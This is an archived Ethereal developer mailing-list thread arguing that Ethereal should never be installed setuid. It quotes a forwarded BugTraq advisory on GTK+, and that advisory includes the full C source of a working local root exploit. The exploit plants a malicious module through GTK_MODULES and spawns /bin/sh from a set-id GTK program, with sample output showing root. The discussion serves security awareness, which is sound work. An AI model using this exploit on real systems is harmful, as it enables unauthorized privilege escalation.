Wireshark · Ethereal-dev: Re: [Ethereal-dev] Set-UID (and set-GID) GTK+ programs are insecure

[Nathan Neulinger <nneul@xxxxxxx>]

Just to make it abundandtly clear, while the below is an issue, it's the
LEAST of your worries making something like ethereal setuid.

Making ethereal setuid is functionaly equivalent to making 'cat' setuid.
It's not designed for it, and likely never will be. 

For the simplest example: create a capture, save as "/etc/passwd". If
it's setuid, you just replaced the passwd file. And, depending on how
ethereal handles umasks and file creation, you may just have created
/etc/passwd world writable. 

Now, once the 'capture' portion is made to be a external miniature
setuid app, then the story will be different. 

The only time when ethereal should be setuid is when you would be happy
to give root to any person you allow to run ethereal, and even then it's
just a bad idea. (i.e. you are doing it because you are too lazy to su
before running it.)

Now, it might be reasonably safe to allow tethereal to be setuid - *IF*
it disables all -r -w file I/O function when running with uid != euid
*or* made extensive use of access(), but even then, I'd say it's a bad
idea without a significant security audit.

I personally think that the setuid install option should never have been
added. The very idea of doing that type of install is ludicrous to me in
ethereals current design.

-- Nathan

Guy Harris wrote:
> 
> Why you might not want to make Ethereal set-UID:
> 
> From: Erik Mouw <J.A.K.Mouw@xxxxxxxxxxxxxx>
> To: gtk-devel-list@xxxxxxxxx
> Subject: Fwd: gtk+ security hole.
> Organization: Eric Conspiracy Secret Labs
> 
> Hi all,
> 
> This came by on the BugTraq mailing list. Pity that the original poster
> didn't take this to the gtk-devel list.
> 
> I replied to the original message stating that suid GTK+ programs are
> discouraged. Don't know if the moderator will let my reply through,
> though.
> 
> Erik
> 
> ----- Forwarded message from Chris Sharp <v9@xxxxxxxxxxxx> -----
> 
> From: Chris Sharp <v9@xxxxxxxxxxxx>
> To: BUGTRAQ@xxxxxxxxxxxxxxxxx
> Date:         Tue, 2 Jan 2001 00:15:35 -0000
> Subject:      gtk+ security hole.
> 
> while going through a quick audit of gtk i found:
> 
> gtk+ can be tricked into running arbitrary code
> via a bogus module.  this means any program using
> gtk that is set*id can be exploited via this
> method.  here is an exploit i wrote for this
> security hole:
> 
> original xgtk.c(working/un-wrapped):
> http://realhalo.org/xgtk.c
> 
> xgtk.c:
> /* (*)gtk+[v*] local module exploit, by
> v9[v9@xxxxxxxxxxxx].  this will give
>    you the euid/egid of a set*id program using
> gtk+.  this exploit works via
>    the GTK_MODULES environmental variable, by
> tricking gtk to execute arbitrary
>    functions/commands with a bogus module. (using
> gtk_module_init())
> 
>    example(./xgtk):
> -------------------------------------------------------------------------------
> # ls -l /usr/bin/X11/gtk_program
> -rwxr-sr-x   1 root     tty        437625 Oct 23
> 1999 /usr/bin/X11/gtk_program
> # cc xgtk.c -o xgtk
> # ./xgtk /usr/bin/X11/gtk_program :0.0
> [ (*)gtk+[v*] local module exploit, by
> v9[v9@xxxxxxxxxxxx]. ]
> [ program: /usr/bin/X11/gtk_program(->/bin/sh),
> display: :0.0. ]
> 
> [*] making module for gtk+ to execute.
> (/tmp/gtkm.c)
> [*] done, compiling module source file.
> (/tmp/gtkm.c->/tmp/gtkm.so)
> [*] done, checking to see if the module comiled.
> (/tmp/gtkm.so)
> [*] done, setting up the environment.
> (module&display)
> [*] done, executing /usr/bin/X11/gtk_program, the
> module should load now.
> [*] success, module loaded successfully.
> [*] id stats: uid: 0, euid: 0, gid: 0, egid: 5.
> [*] now executing: /bin/sh.
> #
> -------------------------------------------------------------------------------
> 
>    note: this will require a valid display to
> exploit successfully.  also, i'm
>          unsure of this for other gtk versions, i
> would just assume as much
>          that this applies to it.
> */
> #define GCCPATH "/usr/bin/gcc"  // path to gcc.
> #define SRCFILE "/tmp/gtkm.c"   // source to the
> fake module to load.
> #define MODEXEC "/tmp/gtkm.so"  // fake module to
> load.
> #define DISPLAY ":0.0"          // default
> display. (also argv option)
> #define EXECUTE "/bin/sh"       // execute this
> program.
> #include <stdio.h>
> #include <sys/stat.h>
> int main(int argc,char **argv){
>  char cmd[256],syscmd[256],display[256];
>  struct stat mod1,mod2,mod3;
>  FILE *source;
>  fprintf(stderr,"[ (*)gtk+[v*] local module
> exploit, by v9[v9@xxxxxxxxxxxx]. ]"
>  "\n");
>  if(argc>1){strncpy(cmd,argv[1],sizeof(cmd));}
>  else{
>   fprintf(stderr,"[!] syntax: %s
> </path/to/program> [display]\n",argv[0]);
>   exit(-1);
>  }
> 
> if(argc>2){strncpy(display,argv[2],sizeof(display));}
>  else{strncpy(display,DISPLAY,sizeof(display));}
>  if(stat(cmd,&mod1)){
>   fprintf(stderr,"[!] failed, %s doesn't seem to
> exist. (path needed)\n",cmd);
>   exit(-1);
>  }
>  if(stat(GCCPATH,&mod2)){
>   fprintf(stderr,"[!] failed, %s compiler doesn't
> seem to exist.\n",GCCPATH);
>   exit(-1);
>  }
>  fprintf(stderr,"[ program: %s(->%s), display: %s.
> ]\n\n",cmd,EXECUTE,display);
>  fprintf(stderr,"[*] making module for gtk+ to
> execute. (%s)\n",SRCFILE);
>  unlink(SRCFILE);
>  unlink(MODEXEC);
>  source=fopen(SRCFILE,"w");
>  fprintf(source,"#include <stdio.h>\n");
>  fprintf(source,"void gtk_module_init(){\n");
>  fprintf(source," unlink(\"%s\");\n",SRCFILE);
>  fprintf(source," unlink(\"%s\");\n",MODEXEC);
>  fprintf(source," fprintf(stderr,\"[*] success,
> module loaded successfully.\\n"
>  "\");\n");
>  fprintf(source," fprintf(stderr,\"[*] id stats:
> uid: %%d, euid: %%d, gid: %%d"
>  ", egid:
> %%d.\\n\",getuid(),geteuid(),getgid(),getegid());\n",EXECUTE);
>  fprintf(source," fprintf(stderr,\"[*] now
> executing: %s.\\n\");\n",EXECUTE);
>  fprintf(source,"
> execl(\"%s\",\"%s\",0);\n",EXECUTE,EXECUTE);
>  fprintf(source,"}\n");
>  fclose(source);
>  fprintf(stderr,"[*] done, compiling module source
> file. (%s->%s)\n",SRCFILE,
>  MODEXEC);
>  snprintf(syscmd,sizeof(syscmd),"%s -shared -o %s
> %s 1>/dev/null 2>&1",GCCPATH,
>  MODEXEC,SRCFILE);
>  system(syscmd);
>  fprintf(stderr,"[*] done, checking to see if the
> module comiled. (%s)\n",
>  MODEXEC);
>  if(stat(MODEXEC,&mod3)){
>   fprintf(stderr,"[!] failed, %s was not compiled
> properly. (gcc failed)\n",
>   MODEXEC);
>   exit(-1);
>  }
>  fprintf(stderr,"[*] done, setting up the
> environment. (module&display)\n");
>  setenv("GTK_MODULES",MODEXEC,1);
>  setenv("DISPLAY",display,1);
>  fprintf(stderr,"[*] done, executing %s, the
> module should load now.\n",cmd);
>  if(execl(cmd,cmd,0)){
>   fprintf(stderr,"[!] failed, %s did not execute
> properly.\n",cmd);
>   unlink(SRCFILE);
>   unlink(MODEXEC);
>   exit(-1);
>  }
> }
> 
> Vade79 -> v9@xxxxxxxxxxxx -> www.fakehalo.org.
> 
> ----- End forwarded message -----
> 
> --
> J.A.K. (Erik) Mouw, Information and Communication Theory Group, Department
> of Electrical Engineering, Faculty of Information Technology and Systems,
> Delft University of Technology, PO BOX 5031,  2600 GA Delft, The Netherlands
> Phone: +31-15-2783635  Fax: +31-15-2781843  Email: J.A.K.Mouw@xxxxxxxxxxxxxx
> WWW: http://www-ict.its.tudelft.nl/~erik/
> 
> _______________________________________________
> gtk-devel-list mailing list
> gtk-devel-list@xxxxxxxxx
> http://mail.gnome.org/mailman/listinfo/gtk-devel-list
> 
> _______________________________________________
> Ethereal-dev mailing list
> Ethereal-dev@xxxxxxxxxxxx
> http://www.ethereal.com/mailman/listinfo/ethereal-dev

-- 


------------------------------------------------------------
Nathan Neulinger                       EMail:  nneul@xxxxxxx
University of Missouri - Rolla         Phone: (573) 341-4841
CIS - Systems Programming                Fax: (573) 341-4216